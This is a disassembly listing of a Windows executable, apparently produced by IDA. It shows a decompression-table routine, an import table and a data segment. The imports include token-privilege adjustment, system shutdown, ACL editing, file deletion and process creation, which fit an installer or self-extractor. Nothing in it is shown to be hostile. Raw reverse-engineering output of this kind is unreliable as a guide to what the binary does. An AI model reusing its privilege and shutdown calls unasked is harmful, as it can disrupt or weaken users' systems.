var_1 = byte ptr -1
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 50h
push ebx
push esi
push edi
push 8
pop ecx
xor eax, eax
lea edi, [ebp+var_2A]
push 8
rep stosd
mov ecx, [ebp+arg_4]
pop edx
loc_1005C8C: ; CODE XREF: sub_1005C73+25�j
movzx eax, byte ptr [ecx]
lea eax, [ebp+eax*2+var_2C]
inc word ptr [eax]
inc ecx
dec edx
jnz short loc_1005C8C
push 0Fh
pop ecx
xor ebx, ebx
push 10h
mov [ebp+var_4E], bx
xor eax, eax
pop edx
loc_1005CA8: ; CODE XREF: sub_1005C73+4B�j
mov si, [ebp+eax+var_2A]
shl si, cl
add si, [ebp+eax+var_4E]
dec ecx
mov [ebp+eax+var_4C], si
inc eax
inc eax
dec edx
jnz short loc_1005CA8
xor eax, eax
cmp [ebp+var_2E], bx
jnz loc_1005D7B
push 6
pop ecx
push 7
pop edx
loc_1005CD2: ; CODE XREF: sub_1005C73+73�j
shr [ebp+eax+var_4E], 9
xor esi, esi
inc esi
shl esi, cl
dec ecx
inc eax
inc eax
dec edx
mov [ebp+eax+var_2C], si
jnz short loc_1005CD2
push 8
pop ecx
push 9
lea eax, [ebp+var_1C]
pop edx
loc_1005CF1: ; CODE XREF: sub_1005C73+8A�j
xor esi, esi
inc esi
shl esi, cl
dec ecx
mov [eax], si
inc eax
inc eax
dec edx
jnz short loc_1005CF1
mov edi, [ebp+arg_8]
push 20h
pop ecx
xor eax, eax
rep stosd
mov [ebp+var_1], bl
loc_1005D0C: ; CODE XREF: sub_1005C73+103�j
movzx eax, [ebp+var_1]
mov ecx, [ebp+arg_4]
mov al, [eax+ecx]
test al, al
jz short loc_1005D6F
movzx eax, al
shl eax, 1
lea ecx, [ebp+eax+var_50]
mov dx, [ecx]
xor esi, esi
mov si, [ebp+eax+var_2C]
add si, dx
cmp si, 80h
mov [ebp+var_8], ecx
ja short loc_1005D82
cmp dx, si
jnb short loc_1005D6C
mov eax, esi
sub eax, edx
movzx ecx, ax
mov al, [ebp+var_1]
mov bl, al
mov bh, bl
movzx edi, dx
add edi, [ebp+arg_8]
mov edx, ecx
shr ecx, 2
mov eax, ebx
shl eax, 10h
mov ax, bx
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov ecx, [ebp+var_8]
loc_1005D6C: ; CODE XREF: sub_1005C73+CA�j
mov [ecx], si
loc_1005D6F: ; CODE XREF: sub_1005C73+A5�j
inc [ebp+var_1]
cmp [ebp+var_1], 8
jb short loc_1005D0C
xor eax, eax
inc eax
loc_1005D7B: ; CODE XREF: sub_1005C73+53�j
; sub_1005C73+111�j
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
loc_1005D82: ; CODE XREF: sub_1005C73+C5�j
xor eax, eax
jmp short loc_1005D7B
sub_1005C73 endp
; ---------------------------------------------------------------------------
align 4
dd 5F60h, 2 dup(0)
dd 5FBEh, 1138h, 5E28h, 2 dup(0)
dd 60DCh, 1000h, 5E64h, 2 dup(0)
dd 648Eh, 103Ch, 5F3Ch, 2 dup(0)
dd 6516h, 1114h, 5F78h, 2 dup(0)
dd 6570h, 1150h, 5E5Ch, 2 dup(0)
dd 657Ah, 1034h, 5F30h, 2 dup(0)
dd 65B6h, 1108h, 5 dup(0)
dd 600Ah, 60BCh, 60ACh, 6096h, 607Ah, 6062h, 5FCAh, 5FE4h
dd 5FF4h, 601Eh, 603Ah, 6050h, 0
dd 80000011h, 0
dd 6444h, 6454h, 629Ah, 60EAh, 60F6h, 6108h, 6114h, 6122h
dd 6134h, 614Ch, 6160h, 6170h, 617Eh, 618Ch, 61A4h, 61B8h
dd 61C4h, 61CCh, 61E6h, 6200h, 6216h, 6222h, 6230h, 623Ch
dd 624Ah, 6262h, 6270h, 6284h, 6434h, 62AAh, 62BCh, 62CCh
dd 62E2h, 62F0h, 6304h, 631Ah, 632Ch, 6342h, 6356h, 636Eh
dd 637Eh, 6392h, 63A4h, 63B4h, 63CCh, 63DAh, 63F4h, 640Ch
dd 6422h, 6466h, 0
dd 65A0h, 6588h, 0
dd 64D0h, 649Ch, 64AAh, 64B6h, 64C2h, 64E2h, 64F2h, 6508h
dd 0
dd 5F8Ch, 5F96h, 5FA0h, 5FAAh, 5FB4h, 0
dd 655Ch, 6546h, 652Ch, 6522h, 0
dd 747302FDh, 72686372h, 2F80000h, 69727073h, 66746Eh
dd 7473030Bh, 72747372h, 1F90000h, 7274735Fh, 72776Ch
dd 74730307h, 70636E72h, 736D0079h, 74726376h, 6C6C642Eh
dd 1320000h
aInitiatesystem db 'InitiateSystemShutdownA',0
db 0F4h ; ô
align 2
aGetlengthsid db 'GetLengthSid',0
align 4
db 17h
db 1, 47h, 65h
aTtokeninformat db 'tTokenInformation',0
dw 1A8h
aOpenprocesstok db 'OpenProcessToken',0
align 2
dw 1Dh
aAllocateandini db 'AllocateAndInitializeSid',0
align 2
aQ db 'Ÿ',0
aCryptreleaseco db 'CryptReleaseContext',0
db '•',0
aCryptgenrandom db 'CryptGenRandom',0
align 2
aD db '„',0
aCryptacquireco db 'CryptAcquireContextA',0
align 2
dw 22Eh
aSetsecuritydes db 'SetSecurityDescriptorDacl',0
dw 10h
aAddaccessallow db 'AddAccessAllowedAce',0
db 2Fh ; /
db 1, 49h, 6Eh
aItializeacl db 'itializeAcl',0
db 30h ; 0
db 1, 49h, 6Eh
aItializesecuri db 'itializeSecurityDescriptor',0
align 4
aAdvapi32_dll db 'ADVAPI32.dll',0
db 0, 90h, 2
aReadfile db 'ReadFile',0
align 2
dw 2F1h
aSetfilepointer db 'SetFilePointer',0
align 4
db 0F5h ; õ
db 1, 48h, 65h
aApfree db 'apFree',0
align 4
db ',',0
aClosehandle db 'CloseHandle',0
aR db 'à',0
aFormatmessagea db 'FormatMessageA',0
align 4
db 2Dh ; -
db 2, 4Ch, 65h
aAvecriticalsec db 'aveCriticalSection',0
align 4
db 9Fh ; Ÿ
db 2, 52h, 65h
aMovedirectorya db 'moveDirectoryA',0
align 10h
db 5Ah ; Z
db 1, 47h, 65h
aTlasterror db 'tLastError',0
align 10h
db 'x',0
aDeletefilea db 'DeleteFileA',0
dw 24Bh
aMovefileexa db 'MoveFileExA',0
db '‹',0
aEntercriticals db 'EnterCriticalSection',0
align 4
db 31h ; 1
db 3, 54h, 65h
aRminateprocess db 'rminateProcess',0
align 4
db 0ECh ; ì
db 2, 53h, 65h
aTevent db 'tEvent',0
align 4
db 29h ; )
db 3, 53h, 6Ch
db 65h ; e
db 65h, 70h, 0
db 0E9h ; é
db 2, 53h, 65h
aTenvironmentva db 'tEnvironmentVariableA',0
dw 142h
aGetenvironment db 'GetEnvironmentVariableA',0
db 69h ; i
db 3, 57h, 69h
aDechartomultib db 'deCharToMultiByte',0
dw 1EFh
aHeapalloc db 'HeapAlloc',0
aJ db 'J',0
aCreatefilea db 'CreateFileA',0
dd 72570376h, 46657469h, 656C69h, 784500ABh, 72507469h
dd 7365636Fh, 760073h
aDeletecritical db 'DeleteCriticalSection',0
db 'å',0
aFreelibrary db 'FreeLibrary',0
db 'Û',0
aFlushfilebuffe db 'FlushFileBuffers',0
align 4
db 0A6h ; ¦
db 1, 47h, 65h
aTsystemdirecto db 'tSystemDirectoryA',0
dw 1C8h
aGetversionexa db 'GetVersionExA',0
dw 189h
aGetprocaddress db 'GetProcAddress',0
align 4
db 2Eh ; .
db 2, 4Ch, 6Fh
aAdlibrarya db 'adLibraryA',0
align 4
db 65h ; e
db 3, 57h, 61h
aItforsingleobj db 'itForSingleObject',0
dw 258h
aOpeneventa db 'OpenEventA',0
align 10h
db 2Fh ; /
db 1, 47h, 65h
aTcurrentproces db 'tCurrentProcess',0
db 48h ; H
db 1, 47h, 65h
aTfileattribute db 'tFileAttributesA',0
align 2
dw 0FDh
aGetcommandline db 'GetCommandLineA',0
db 65h ; e
db 1, 47h, 65h
aTmodulefilenam db 'tModuleFileNameA',0
align 2
aB db 'B',0
aCreatedirector db 'CreateDirectoryA',0
align 2
dw 32Eh
aSystemtimetofi db 'SystemTimeToFileTime',0
align 2
dw 1AAh
aGetsystemtime db 'GetSystemTime',0
dw 139h
aGetdiskfreespa db 'GetDiskFreeSpaceA',0
dw 27Ah
aQuerydosdevice db 'QueryDosDeviceA',0
db 3Dh ; =
db 1, 47h, 65h
aTdrivetypea db 'tDriveTypeA',0
db 2Dh ; -
db 1, 47h, 65h
aTcurrentdirect db 'tCurrentDirectoryA',0
align 4
dd 655302F5h, 6C694674h, 6D695465h, 2360065h
aLocalfiletimet db 'LocalFileTimeToFileTime',0
aD_0 db '„',0
aDosdatetimetof db 'DosDateTimeToFileTime',0
db 44h ; D
db 1, 47h, 65h
aTexitcodeproce db 'tExitCodeProcess',0
align 2
db '\',0
aCreateprocessa db 'CreateProcessA',0
align 4
aE db 'e',0
aCreatethread db 'CreateThread',0
align 4
aF db 'F',0
aCreateeventa db 'CreateEventA',0
align 4
dd 6547018Bh, 6F725074h, 73736563h, 70616548h, 2030000h
aInitializecrit db 'InitializeCriticalSectionAndSpinCount',0
aKernel32_dll db 'KERNEL32.dll',0
align 4
dd 6F4C01C8h, 74536461h, 676E6972h, 0C60041h, 44646E45h
dd 6F6C6169h, 2660067h, 50746553h, 6E657261h, 1DC0074h
dd 7373654Dh, 42656761h, 41786Fh, 6944009Eh, 676F6C61h
dd 50786F42h, 6D617261h, 23B0041h, 646E6553h, 7373654Dh
dd 41656761h, 2360000h
aSenddlgitemmes db 'SendDlgItemMessageA',0
db 92h ; ’
db 2, 53h, 68h
aOwwindow db 'owWindow',0
align 2
aUser32_dll db 'USER32.dll',0
align 2
aB_0 db 'b',0
aNtclose db 'NtClose',0
aT db 'T',0
aNtadjustprivil db 'NtAdjustPrivilegesToken',0
db 'Ç',0
aNtopenprocesst db 'NtOpenProcessToken',0
align 4
db 47h ; G
db 1, 4Eh, 74h
aShutdownsystem db 'ShutdownSystem',0
align 10h
aNtdll_dll db 'ntdll.dll',0
aComctl32_dll db 'COMCTL32.dll',0
align 4
aJ_0 db 'j',0
aShgetpathfromi db 'SHGetPathFromIDListA',0
align 10h
a@ db '@',0
aShbrowseforfol db 'SHBrowseForFolderA',0
align 2
aShell32_dll db 'SHELL32.dll',0
align 40h
_text ends
; Section 2. (virtual address 00007000)
; Virtual size : 00010C28 ( 68648.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00005A00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 1007000h
off_1007000 dd offset off_1007000 ; DATA XREF: sub_10015BE:loc_10015E5�r
; sub_10015BE+33�o ...
align 8
off_1007008 dd offset off_1007008 ; DATA XREF: sub_10015BE+6D�r
; sub_10015BE+79�o ...
align 10h
; DWORD dword_1007010
dword_1007010 dd 0D82F8h ; sub_100269E+392�r ...
; LONG lDistanceToMove
lDistanceToMove dd 80006600h ; DATA XREF: sub_10014E0+B�r
; sub_10014E0+24�r ...
dword_1007018 dd 0CAB00EEEh ; HANDLE hFile
hFile dd 0FFFFFFFFh ; DATA XREF: sub_10013BC+4�r
; sub_10013BC+2C�r ...
; HINSTANCE hInstance
hInstance dd 0 ; DATA XREF: sub_1001556+19�r
; sub_1001CB9+49�r ...
dword_1007024 dd 0 ; sub_1001CB9+8F�w ...
; HANDLE hObject
hObject dd 0 ; DATA XREF: sub_10014C1+C�r
; sub_10014C1+15�w ...
dword_100702C dd 0 ; sub_1002272:loc_10024BE�w ...
dword_1007030 dd 0 ; sub_1002272+29B�w ...
; LPARAM lParam
lParam dd 0 ; DATA XREF: sub_1002272+46�w
; sub_1002272:loc_100232E�r ...
dword_1007038 dd 0 ; sub_1002272+2C5�w ...
align 10h
dword_1007040 dd 0 ; sub_10017DE+1A�r
dd 6Fh dup(0)
dd 90h dup(?)
dword_1007440 dd ? ; sub_10013BC+41�r ...
dword_1007444 dd ? ; sub_1001BF1+7D�w
dword_1007448 dd ? ; sub_1001BF1+87�w ...
; int dword_100744C
dword_100744C dd ? dword_1007450 dd 7Fh dup(?) db 3 dup(?)
byte_100764F db ? ; DATA XREF: sub_10013BC+67�w
dd 4 dup(?)
; char FileName[]
FileName dd ? ; DATA XREF: sub_1002272+1D9�o
; sub_1002272+1EF�r ...
dd 40h dup(?)
; HWND hWnd
hWnd dd ? ; DATA XREF: sub_10016BA+22�w
; sub_10016BA:loc_100172D�w ...
dword_1007768 dd ? ; sub_1002272+2E4�w ...
; LPARAM dword_100776C
dword_100776C dd ? ; sub_1002AE1+AE�w ...
; HWND hWndNewParent
hWndNewParent dd ? ; DATA XREF: sub_10016BA+37�w
; start_0+EA�r
; HANDLE hEvent
hEvent dd ? ; DATA XREF: sub_10016BA:loc_10016FC�r
; start_0+82�w ...
align 10h
; char NumberOfBytesRead[]
NumberOfBytesRead dd ? ; DATA XREF: sub_1002272+C�o
; sub_1002272+29�r ...
dd 40h dup(?)
; HANDLE hProcess
hProcess dd ? ; DATA XREF: sub_10016BA+5B�r
; start_0+43D�w ...
dd 6 dup(?)
; struct _RTL_CRITICAL_SECTION CriticalSection
CriticalSection _RTL_CRITICAL_SECTION <?> ; DATA XREF: sub_10015BE+4�o
; sub_10015BE:loc_10016AA�o ...
; HANDLE hHeap
hHeap dd ? ; DATA XREF: sub_10014AE+6�r
; sub_100180D+ED�r ...
dword_10078BC dd ? ; start_0:loc_1002FF5�r ...
; char Buffer[]
Buffer dd ? ; DATA XREF: sub_10015BE:loc_1001687�o
; sub_1001746+5�o ...
dd 47h dup(?)
; char Caption[]
Caption dd ? ; DATA XREF: sub_1002272+C8�w
; sub_1002272+108�o ...
dd 47h dup(?)
; char Value[]
Value db 120h dup(?) ; DATA XREF: sub_1001BF1+1B�o
; start_0+361�o
; PSID pSid
pSid dd ? ; DATA XREF: sub_1001FAA+70�o
; sub_1001FAA:loc_1002031�r ...
dd 3FFFh dup(?)
dword_1017C20 dd ? ; sub_1002272+2B8�w ...
; LPCSTR lpCurrentDirectory
lpCurrentDirectory dd ? ; DATA XREF: sub_1002AE1+FB�w
; start_0+3FA�r
align 200h
_data ends
end start